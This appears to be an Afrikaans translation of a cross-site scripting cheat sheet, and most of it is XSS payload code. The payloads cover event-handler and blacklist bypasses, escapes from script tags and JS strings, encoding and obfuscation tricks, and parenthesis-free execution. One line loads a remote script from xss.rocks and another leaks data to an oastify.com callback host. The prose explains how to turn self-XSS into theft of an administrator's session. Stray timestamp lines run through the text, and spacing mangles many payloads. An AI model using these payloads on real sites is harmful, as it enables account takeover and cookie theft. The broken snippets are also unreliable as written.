As jy enige URL in 'n arbitrêre ** `<a href=` ** tag kan inspuit wat die ** `target="_blank" en rel="opener"` ** eienskappe bevat, kyk na die **volgende bladsy om hierdie gedrag te benut** :
2021-05-01 15:23:19 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="../reverse-tab-nabbing.md" %}
[reverse-tab-nabbing.md ](../reverse-tab-nabbing.md )
{% endcontent-ref %}
2021-05-01 15:23:19 +00:00
2024-07-19 16:15:11 +00:00
### op Gebeurtenis Hanteerders Omseiling
2024-04-06 18:08:38 +00:00
2024-08-18 11:01:35 +00:00
Eerstens, kyk na hierdie bladsy ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) vir nuttige ** "on" gebeurtenis hanteerders**.\
2024-07-19 16:15:11 +00:00
As daar 'n swartlys is wat jou verhinder om hierdie gebeurtenis hanteerders te skep, kan jy die volgende omseilings probeer:
2021-06-02 22:22:26 +00:00
```javascript
< svg onload % 09 = alert(1) > //No safari
< svg % 09onload = alert(1) >
< svg % 09onload % 20 = alert(1) >
< svg onload % 09 % 20 % 28 % 2c % 3b = alert(1) >
//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
```
2024-07-19 16:15:11 +00:00
### XSS in "Onbenutbare merke" (verborgene invoer, skakel, kanoniek, meta)
2021-06-02 22:22:26 +00:00
2024-08-18 11:01:35 +00:00
Van [**hier** ](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags ) **is dit nou moontlik om verborgene invoer te misbruik met:**
2023-07-28 11:44:45 +00:00
```html
< button popvertarget = "x" > Click me< / button >
< input type = "hidden" value = "y" popover id = "x" onbeforetoggle = alert(1) >
```
2024-09-22 16:51:03 +00:00
En in **meta-tags** :
2023-07-28 11:44:45 +00:00
```html
<!-- Injection inside meta attribute -->
< meta name = "apple-mobile-web-app-title" content = "" Twitter popover id = "newsletter" onbeforetoggle = alert(2) / >
<!-- Existing target -->
< button popovertarget = "newsletter" > Subscribe to newsletter< / button >
< div popover id = "newsletter" > Newsletter popup< / div >
```
2024-09-22 16:51:03 +00:00
Van [**hier** ](https://portswigger.net/research/xss-in-hidden-input-fields ): Jy kan 'n **XSS payload binne 'n verborge attribuut** uitvoer, mits jy die **slagoffer** kan **oortuig** om die **sleutel kombinasie** te druk. Op Firefox Windows/Linux is die sleutel kombinasie **ALT+SHIFT+X** en op OS X is dit **CTRL+ALT+X** . Jy kan 'n ander sleutel kombinasie spesifiseer deur 'n ander sleutel in die toegang sleutel attribuut te gebruik. Hier is die vektor:
2020-07-15 15:43:14 +00:00
```markup
< input type = "hidden" accesskey = "X" onclick = "alert(1)" >
```
2024-07-19 16:15:11 +00:00
**Die XSS payload sal iets soos hierdie wees: `" accesskey="x" onclick="alert(1)" x="` **
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Swartlys Omseilings
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Verskeie truuks met die gebruik van verskillende kodering is reeds in hierdie afdeling blootgestel. Gaan **terug om te leer waar jy kan gebruik:**
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
* **HTML kodering (HTML etikette)**
* **Unicode kodering (kan geldige JS kode wees):** `\u0061lert(1)`
* **URL kodering**
* **Hex en Oktale kodering**
* **data kodering**
2023-02-07 10:56:16 +00:00
2024-07-19 16:15:11 +00:00
**Omseilings vir HTML etikette en eienskappe**
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Lees die [Swartlys Omseilings van die vorige afdeling ](./#blacklist-bypasses ).
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
**Omseilings vir JavaScript kode**
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Lees die J[avaScript omseiling swartlys van die volgende afdeling](./#javascript-bypass-blacklists-techniques).
2020-07-15 15:43:14 +00:00
2022-05-01 16:57:45 +00:00
### CSS-Gadgets
2022-02-22 10:32:26 +00:00
2024-07-19 16:15:11 +00:00
As jy 'n **XSS in 'n baie klein deel** van die web gevind het wat 'n soort interaksie vereis (miskien 'n klein skakel in die voettekst met 'n onmouseover element), kan jy probeer om die **spasie wat daardie element beset te wysig** om die waarskynlikheid te maksimeer dat die skakel geaktiveer word.
2022-02-22 10:32:26 +00:00
2024-07-19 16:15:11 +00:00
Byvoorbeeld, jy kan 'n bietjie styl by die element voeg soos: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
2022-02-22 10:32:26 +00:00
2024-07-19 16:15:11 +00:00
Maar, as die WAF die styl eienskap filter, kan jy CSS Styling Gadgets gebruik, so as jy byvoorbeeld vind
2022-02-22 10:32:26 +00:00
2024-07-19 16:15:11 +00:00
> .test {display:block; color: blue; width: 100%\}
2022-02-22 10:32:26 +00:00
2024-02-11 02:07:06 +00:00
en
2022-02-22 10:32:26 +00:00
> \#someid {top: 0; font-family: Tahoma;}
2024-02-18 14:51:58 +00:00
Nou kan jy ons skakel wysig en dit na die vorm bring
2022-02-22 10:32:26 +00:00
2024-02-05 02:29:11 +00:00
> \<a href="" id=someid class=test onclick=alert() a="">
2022-02-22 10:32:26 +00:00
2024-02-11 02:07:06 +00:00
Hierdie truuk is geneem van [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703 ](https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703 )
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
## Inspuiting binne JavaScript kode
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
In hierdie geval gaan jou **invoer** **binne die JS kode** van 'n `.js` lêer of tussen `<script>...</script>` etikette of tussen HTML gebeurtenisse wat JS kode kan uitvoer of tussen eienskappe wat die `javascript:` protokol aanvaar.
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
### Ontsnapping \<script> etiket
2024-04-06 18:08:38 +00:00
2024-09-22 16:51:03 +00:00
As jou kode binne `<script> [...] var input = 'reflected data' [...] </script>` ingevoeg word, kan jy maklik **die sluiting van die `<script>`** etiket ontsnap:
2020-07-15 15:43:14 +00:00
```javascript
< / script > < img src = 1 onerror = alert(document.domain) >
```
2024-09-22 16:51:03 +00:00
Let wel dat ons in hierdie voorbeeld **selfs nie die enkele aanhalingsteken gesluit het nie** . Dit is omdat **HTML-parsing eers deur die blaaier uitgevoer word** , wat behels dat bladsy-elemente geïdentifiseer word, insluitend blokke van skrip. Die parsing van JavaScript om die ingebedde skrips te verstaan en uit te voer, word slegs daarna uitgevoer.
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
### Binne JS-kode
2020-07-15 15:43:14 +00:00
2024-09-19 16:41:42 +00:00
As `<>` gesanitiseer word, kan jy steeds die **string ontsnap** waar jou invoer **geleë** is en **arbitraire JS uitvoer** . Dit is belangrik om **JS-sintaksis reg te stel** , want as daar enige foute is, sal die JS-kode nie uitgevoer word nie:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
```
2024-07-19 16:15:11 +00:00
### Template literals \`\`
2020-07-15 15:43:14 +00:00
2024-08-18 11:01:35 +00:00
Om **strings** te konstrueer behalwe enkel- en dubbel aanhalings, aanvaar JS ook **backticks** ** ` `` ` **. Dit staan bekend as template literals aangesien dit toelaat om **ingebedde JS-uitdrukkings** te gebruik met `${ ... }` sintaksis.\
2024-07-19 16:15:11 +00:00
As jy dus vind dat jou invoer **reflected** word binne 'n JS-string wat backticks gebruik, kan jy die sintaksis `${ ... }` misbruik om **arbitrary JS code** uit te voer:
2023-02-07 10:56:16 +00:00
2024-07-19 16:15:11 +00:00
Dit kan **abused** word met:
2023-02-07 10:56:16 +00:00
```javascript
`${alert(1)}`
`${` ${`${`${alert(1)}`}`}`}`
```
```````````````javascript
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop(){return loop}
loop``````````````
```````````````
2024-07-19 16:15:11 +00:00
### Gecodeerde kode-uitvoering
2021-06-04 17:27:53 +00:00
```markup
2021-06-02 22:22:26 +00:00
< script > \u0061 lert ( 1 )</ script >
2021-06-04 15:00:45 +00:00
< svg > < script > a l e r t & l p a r ; ' 1 ' & r p a r ;
2021-06-04 17:27:53 +00:00
< svg > < script > & # x61 ; & # x6C ; & # x65 ; & # x72 ; & # x74 ; & # x28 ; & # x31 ; & # x29 ; < / script > < / svg > <!-- The svg tags are neccesary
< iframe srcdoc = "<SCRIPT>alert(1)</iframe>" >
2021-06-02 22:22:26 +00:00
```
2024-09-19 16:41:42 +00:00
### Unicode Kodering JS uitvoering
2023-02-07 10:56:16 +00:00
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
2024-07-19 16:15:11 +00:00
### JavaScript omseil swartlyste tegnieke
2020-07-15 15:43:14 +00:00
2022-04-28 23:27:22 +00:00
**Strings**
2020-07-15 15:43:14 +00:00
```javascript
"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
2023-02-07 10:56:16 +00:00
"\h\e\l\l\o"
2020-07-15 15:43:14 +00:00
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
2021-06-02 22:22:26 +00:00
"\a\l\ert\(1\)"
2020-07-15 15:43:14 +00:00
atob("dGhpc2lzYXN0cmluZw==")
2021-06-04 17:18:34 +00:00
eval(8680439..toString(30))(983801..toString(36))
2020-07-15 15:43:14 +00:00
```
2024-07-19 16:15:11 +00:00
**Spesiale ontsnapings**
2023-02-07 10:56:16 +00:00
```javascript
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
'\b' //backspace
'\f' //form feed
'\n' //new line
'\r' //carriage return
'\t' //tab
// Any other char escaped is just itself
```
2024-07-19 16:15:11 +00:00
**Spasie vervangings binne JS kode**
2020-07-15 15:43:14 +00:00
```javascript
< TAB >
/**/
```
2024-07-19 16:15:11 +00:00
**JavaScript kommentaar (van** [**JavaScript Kommentaar** ](./#javascript-comments ) **trik)**
2020-07-15 15:43:14 +00:00
```javascript
//This is a 1 line comment
/* This is a multiline comment*/
2023-03-03 17:26:17 +00:00
<!-- This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
2020-07-15 15:43:14 +00:00
```
2024-07-19 16:15:11 +00:00
**JavaScript nuwe lyne (van** [**JavaScript nuwe lyn** ](./#javascript-new-lines ) **trik)**
2020-07-15 15:43:14 +00:00
```javascript
//Javascript interpret as new line these chars:
2023-03-03 17:26:17 +00:00
String.fromCharCode(10); alert('//\nalert(1)') //0x0a
String.fromCharCode(13); alert('//\ralert(1)') //0x0d
String.fromCharCode(8232); alert('//\u2028alert(1)') //0xe2 0x80 0xa8
String.fromCharCode(8233); alert('//\u2029alert(1)') //0xe2 0x80 0xa9
```
2024-09-18 16:23:15 +00:00
**JavaScript spasie**
2023-03-03 17:26:17 +00:00
```javascript
log=[];
function funct(){}
2024-02-11 02:07:06 +00:00
for(let i=0;i< =0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
2023-03-03 17:26:17 +00:00
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279
//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
< img / src / onerror = alert(1) >
```
2024-02-11 02:07:06 +00:00
**Javascript binne 'n kommentaar**
2023-03-03 17:26:17 +00:00
```javascript
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send
//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
2020-07-15 15:43:14 +00:00
```
2024-09-22 16:51:03 +00:00
**JavaScript sonder hakies**
2023-02-07 10:56:16 +00:00
````javascript
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
2024-02-11 02:07:06 +00:00
// or any DOMXSS sink such as location=name
2023-02-07 10:56:16 +00:00
// Backtips
2024-02-11 02:07:06 +00:00
// Backtips pass the string as an array of lenght 1
2023-02-07 10:56:16 +00:00
alert`1`
// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
2024-02-11 02:07:06 +00:00
// To pass several arguments you can use
2023-02-07 10:56:16 +00:00
function btt(){
2024-02-11 02:07:06 +00:00
console.log(arguments);
2023-02-07 10:56:16 +00:00
}
btt`${'arg1'}${'arg2'}${'arg3'}`
2024-02-11 02:07:06 +00:00
//It's possible to construct a function and call it
2023-02-07 10:56:16 +00:00
Function`x${'alert(1337)'}x```
2024-02-11 02:07:06 +00:00
// .replace can use regexes and call a function if something is found
2023-02-07 10:56:16 +00:00
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
2024-02-11 02:07:06 +00:00
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
2023-02-07 10:56:16 +00:00
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
2024-02-11 02:07:06 +00:00
// Using Reflect.apply to call any function with any argumnets
2023-02-07 10:56:16 +00:00
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
2024-02-11 02:07:06 +00:00
// Using Reflect.set to call set any value to a variable
2023-02-07 10:56:16 +00:00
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
// valueOf, toString
2024-02-11 02:07:06 +00:00
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
2023-02-07 10:56:16 +00:00
valueOf=alert;window+''
toString=alert;window+''
// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
< img src = x onerror = "window.onerror=eval;throw'=alert \x281 \x29'" >
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
2024-02-11 02:07:06 +00:00
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
// Error handler + Comma separator
// The comma separator goes through the list and returns only the last element
2023-02-07 10:56:16 +00:00
var a = (1,2,3,4,5,6) // a = 6
throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
throw onerror=alert,1,1,1,1,1,1337
2024-02-11 02:07:06 +00:00
// optional exception variables inside a catch clause.
2023-02-07 10:56:16 +00:00
try{throw onerror=alert}catch{throw 1}
// Has instance symbol
'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
2024-02-11 02:07:06 +00:00
// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
2023-02-07 10:56:16 +00:00
````
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md ](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md )
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix ](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix )
2024-07-19 16:15:11 +00:00
**Arbitraire funksie (alert) oproep**
2021-10-18 11:21:18 +00:00
````javascript
2021-06-02 22:22:26 +00:00
//Eval like functions
eval('ale'+'rt(1)')
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Function('ale'+'rt(10)')``;
[].constructor.constructor("alert(document.domain)")``
2021-06-07 22:45:34 +00:00
[]["constructor"]["constructor"]`$${alert()}```
2023-03-03 17:26:17 +00:00
import('data:text/javascript,alert(1)')
2021-06-02 22:22:26 +00:00
//General function executions
2020-07-15 15:43:14 +00:00
`` //Can be use as parenthesis
alert`document.cookie`
2024-02-11 02:07:06 +00:00
alert(document['cookie'])
with(document)alert(cookie)
2020-07-15 15:43:14 +00:00
(alert)(1)
(alert(1))in"."
a=alert,a(1)
[1].find(alert)
window['alert'](0)
parent['alert'](1)
self['alert'](2)
top['alert'](3)
this['alert'](4)
frames['alert'](5)
content['alert'](6)
[7].map(alert)
[8].find(alert)
[9].every(alert)
[10].filter(alert)
[11].findIndex(alert)
[12].forEach(alert);
top[/al/.source+/ert/.source](1)
top[8680439..toString(30)](1)
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
$='e'; x='ev'+'al'; x=this[x]; y='al'+$+'rt(1)'; y=x(y); x(y)
x='ev'+'al'; x=this[x]; y='ale'+'rt(1)'; x(x(y))
this[[]+('eva')+(/x/,new Array)+'l'](/xxx.xxx.xxx.xxx.xx/+alert(1),new Array)
2021-02-25 11:39:28 +00:00
globalThis[`al`+/ert/.source]`1`
this[`al`+/ert/.source]`1`
[alert][0].call(this,1)
window['a'+'l'+'e'+'r'+'t']()
window['a'+'l'+'e'+'r'+'t'].call(this,1)
top['a'+'l'+'e'+'r'+'t'].apply(this,[1])
(1,2,3,4,5,6,7,8,alert)(1)
x=alert,x(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
al\u0065rt`1`
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
2021-06-02 22:22:26 +00:00
< svg > < animate onbegin = alert() attributeName = x > < / svg >
2021-10-18 11:21:18 +00:00
````
2024-06-14 11:10:02 +00:00
## **DOM kwesbaarhede**
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Daar is **JS kode** wat **onveilige data wat deur 'n aanvaller beheer word** soos `location.href` gebruik. 'n Aanvaller kan dit misbruik om arbitrêre JS kode uit te voer.\
2024-06-14 11:10:02 +00:00
**As gevolg van die uitbreiding van die verduideliking van** [**DOM kwesbaarhede is dit na hierdie bladsy verskuif** ](dom-xss.md )**:**
2021-05-27 11:59:23 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="dom-xss.md" %}
[dom-xss.md ](dom-xss.md )
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2024-09-18 16:23:15 +00:00
Daar sal jy 'n gedetailleerde **verduideliking vind van wat DOM kwesbaarhede is, hoe hulle uitgelok word, en hoe om dit te benut** .\
2024-09-22 16:51:03 +00:00
Moet ook nie vergeet nie dat **aan die einde van die genoemde pos** jy 'n verduideliking kan vind oor [**DOM Clobbering aanvalle** ](dom-xss.md#dom-clobbering ).
2020-07-15 15:43:14 +00:00
2024-06-14 11:10:02 +00:00
### Opgradering van Self-XSS
### Koekie XSS
2024-08-18 11:01:35 +00:00
As jy 'n XSS kan ontketen deur die payload binne 'n koekie te stuur, is dit gewoonlik 'n self-XSS. As jy egter 'n **kwesbare subdomein vir XSS** vind, kan jy hierdie XSS misbruik om 'n koekie in die hele domein in te voeg en sodoende die koekie XSS in die hoofdomein of ander subdomeine (diegene wat kwesbaar is vir koekie XSS) te ontketen. Hiervoor kan jy die koekie tossing aanval gebruik:
2024-06-14 11:10:02 +00:00
{% content-ref url="../hacking-with-cookies/cookie-tossing.md" %}
[cookie-tossing.md ](../hacking-with-cookies/cookie-tossing.md )
{% endcontent-ref %}
Jy kan 'n groot misbruik van hierdie tegniek vind in [**hierdie blogpos** ](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html ).
### Stuur jou sessie na die admin
2024-07-19 16:15:11 +00:00
Miskien kan 'n gebruiker sy profiel met die admin deel en as die self XSS binne die profiel van die gebruiker is en die admin dit toegang, sal hy die kwesbaarheid ontketen.
2024-06-14 11:10:02 +00:00
2024-07-19 16:15:11 +00:00
### Sessiemirrow
2024-06-14 11:10:02 +00:00
2024-08-18 11:01:35 +00:00
As jy 'n paar self XSS vind en die webblad het 'n **sessiemirrow vir administrateurs** , byvoorbeeld wat kliënte toelaat om hulp te vra, sal die admin sien wat jy in jou sessie sien, maar vanuit sy sessie.
2024-06-14 11:10:02 +00:00
2024-07-19 16:15:11 +00:00
Jy kan die **administrateur jou self XSS laat ontketen** en sy koekies/sessie steel.
2024-06-14 11:10:02 +00:00
2024-09-22 16:51:03 +00:00
## Ander Bypasses
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Genormaliseerde Unicode
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Jy kan kyk of die **reflekteerde waardes** **unicode genormaliseer** word op die bediener (of aan die kliëntkant) en hierdie funksionaliteit misbruik om beskermings te omseil. [**Vind 'n voorbeeld hier** ](../unicode-injection/#xss-cross-site-scripting ).
2024-04-06 18:08:38 +00:00
2024-07-19 16:15:11 +00:00
### PHP FILTER\_VALIDATE\_EMAIL vlag Bypass
2020-07-15 15:43:14 +00:00
```javascript
">< svg / onload = confirm(1) > "@x.y
```
2024-07-19 16:15:11 +00:00
### Ruby-On-Rails omseiling
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
As gevolg van **RoR massatoewysing** word aanhalings in die HTML ingevoeg en dan word die aanhalingbeperking omseil en addisionele velde (onfocus) kan binne die etiket bygevoeg word.\
2024-07-19 16:15:11 +00:00
Formulier voorbeeld ([uit hierdie verslag](https://hackerone.com/reports/709336)), as jy die payload stuur:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
contact[email] onfocus=javascript:alert('xss') autofocus a=a& form_type[a]aaa
```
2024-07-19 16:15:11 +00:00
Die paar "Key","Value" sal soos volg teruggegee word:
2024-02-11 02:07:06 +00:00
```
{" onfocus=javascript:alert(' xss' ) autofocus a"=>"a"}
```
2024-08-18 11:01:35 +00:00
Dan sal die onfocus-attribuut ingevoeg word en XSS vind plaas.
2024-06-14 10:18:18 +00:00
2024-02-11 02:07:06 +00:00
### Spesiale kombinasies
2020-07-15 15:43:14 +00:00
```markup
< iframe / src = "data:text/html,<svg onload=alert(1)>" >
< input type = image src onerror = "prompt(1)" >
< svg onload = alert(1)//
< img src = "/" = _ = " title=" onerror = 'prompt(1)' " >
< img src = '1' onerror = 'alert(0)' <
< script x > a l e r t ( 1 ) < / s c r i p t 1 = 2
< script x > a l e r t ( ' X S S ' ) < s c r i p t y >
< svg / onload = location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
2021-06-02 16:32:07 +00:00
< svg / / / / / / / / onload = alert(1) >
< svg id = x;onload=alert(1) >
< svg id = `x`onload=alert(1) >
2020-07-15 15:43:14 +00:00
< img src = 1 alt = al lang = ert onerror = top[alt+lang](0) >
< script > $ = 1 , alert ( $ ) < / script >
< script ~ ~ ~ > c o n f i r m ( 1 ) < / s c r i p t ~ ~ ~ >
< script > $ = 1 , \u0061 lert ( $ )</ script >
<< /script/script>< script > eval ( ' \\u' + '0061' + 'lert(1)' ) / / </ script >
<< /script/script>< script ~~~ > \u0061lert(1)</script ~~~>
< / style > < / scRipt > < scRipt > alert ( 1 ) < / scRipt >
< img src = x:prompt(eval(alt)) onerror = eval(src) alt = String.fromCharCode(88,83,83) >
< svg > < x > < script > a l e r t ( ' 1 ' & # 4 1 < / x >
< iframe src = "" / srcdoc = '<svg onload=alert(1)>' >
2021-06-02 22:22:26 +00:00
< svg > < animate onbegin = alert() attributeName = x > < / svg >
2020-07-15 15:43:14 +00:00
< img / id = "alert('XSS') \"/alt= \"/ \"src= \"/ \"onerror=eval(id) >
2023-05-03 17:27:46 +00:00
< img src = 1 onerror = "s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);" >
2023-10-16 21:06:07 +00:00
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
2020-07-15 15:43:14 +00:00
```
2024-09-18 16:23:15 +00:00
### XSS met kopinspuiting in 'n 302 antwoord
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
As jy vind dat jy **koppe in 'n 302 herleidingsantwoord kan inspuit** , kan jy probeer om die **blaaier te laat uitvoer arbitrêre JavaScript** . Dit is **nie triviaal nie** aangesien moderne blaaiers nie die HTTP-antwoordliggaam interpreteer as die HTTP-antwoordstatuskode 'n 302 is nie, so net 'n cross-site scripting payload is nutteloos.
2020-10-16 10:44:40 +00:00
2024-09-18 16:23:15 +00:00
In [**hierdie verslag** ](https://www.gremwell.com/firefox-xss-302 ) en [**hierdie een** ](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/ ) kan jy lees hoe jy verskeie protokolle binne die Location-kop kan toets en kyk of enige van hulle die blaaier toelaat om die XSS payload binne die liggaam te inspekteer en uit te voer.\
2024-07-19 16:15:11 +00:00
Verlede bekende protokolle: `mailto://` , `//x:1/` , `ws://` , `wss://` , _leë Location-kop_ , `resource://` .
2020-10-16 10:44:40 +00:00
2024-08-18 11:01:35 +00:00
### Slegs Letters, Nommers en Punte
2020-10-16 10:44:40 +00:00
2024-09-22 16:51:03 +00:00
As jy in staat is om die **callback** aan te dui wat javascript gaan **uitvoer** beperk tot daardie karakters. [**Lees hierdie afdeling van hierdie pos** ](./#javascript-function ) om te vind hoe om hierdie gedrag te misbruik.
2022-06-23 12:12:25 +00:00
2024-09-22 16:51:03 +00:00
### Geldige `<script>` Inhoud-Tipes vir XSS
2022-06-23 12:12:25 +00:00
2024-09-22 16:51:03 +00:00
(Van [**hier** ](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/ )) As jy probeer om 'n skrip met 'n **inhoud-tipe** soos `application/octet-stream` te laai, sal Chrome die volgende fout gooi:
2023-01-05 13:05:03 +00:00
2024-07-19 16:15:11 +00:00
> Weier om skrip van ‘ [https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx') uit te voer omdat sy MIME-tipe (‘ application/octet-stream’ ) nie uitvoerbaar is nie, en streng MIME-tipe kontrole is geaktiveer.
2023-01-05 13:05:03 +00:00
2024-09-22 16:51:03 +00:00
Die enigste **Inhoud-Tipes** wat Chrome sal ondersteun om 'n **gelaaide skrip** uit te voer, is diegene binne die konstante ** `kSupportedJavascriptTypes` ** van [https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc ](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third\_party/blink/common/mime\_util/mime\_util.cc )
2023-01-05 13:05:03 +00:00
```c
const char* const kSupportedJavascriptTypes[] = {
2024-02-11 02:07:06 +00:00
"application/ecmascript",
"application/javascript",
"application/x-ecmascript",
"application/x-javascript",
"text/ecmascript",
"text/javascript",
"text/javascript1.0",
"text/javascript1.1",
"text/javascript1.2",
"text/javascript1.3",
"text/javascript1.4",
"text/javascript1.5",
"text/jscript",
"text/livescript",
"text/x-ecmascript",
"text/x-javascript",
2023-01-05 13:05:03 +00:00
};
```
2024-07-19 16:15:11 +00:00
### Script Types to XSS
2023-01-05 13:05:03 +00:00
2024-07-19 16:15:11 +00:00
(From [**here** ](https://blog.huli.tw/2022/04/24/en/how-much-do-you-know-about-script-type/ )) So, watter tipes kan aangedui word om 'n skrip te laai?
2023-01-05 13:05:03 +00:00
```html
< script type = "???" > < / script >
```
2024-02-11 02:07:06 +00:00
Die antwoord is:
2023-01-05 13:05:03 +00:00
2024-09-16 20:57:57 +00:00
* **module** (standaard, niks om te verduidelik nie)
2024-08-18 11:01:35 +00:00
* [**webbundle** ](https://web.dev/web-bundles/ ): Web Bundles is 'n kenmerk wat jy 'n klomp data (HTML, CSS, JS…) saam in 'n ** `.wbn` ** lêer kan verpakk.
2023-01-05 13:05:03 +00:00
```html
< script type = "webbundle" >
{
2024-02-11 02:07:06 +00:00
"source": "https://example.com/dir/subresources.wbn",
"resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]
2023-01-05 13:05:03 +00:00
}
< / script >
The resources are loaded from the source .wbn, not accessed via HTTP
```
2024-07-19 16:15:11 +00:00
* [**importmap** ](https://github.com/WICG/import-maps )**:** Laat toe om die invoer-sintaksis te verbeter
2023-01-05 13:05:03 +00:00
```html
< script type = "importmap" >
{
2024-02-11 02:07:06 +00:00
"imports": {
"moment": "/node_modules/moment/src/moment.js",
"lodash": "/node_modules/lodash-es/lodash.js"
}
2023-01-05 13:05:03 +00:00
}
< / script >
<!-- With importmap you can do the following -->
< script >
import moment from "moment";
import { partition } from "lodash";
< / script >
```
2024-09-22 16:51:03 +00:00
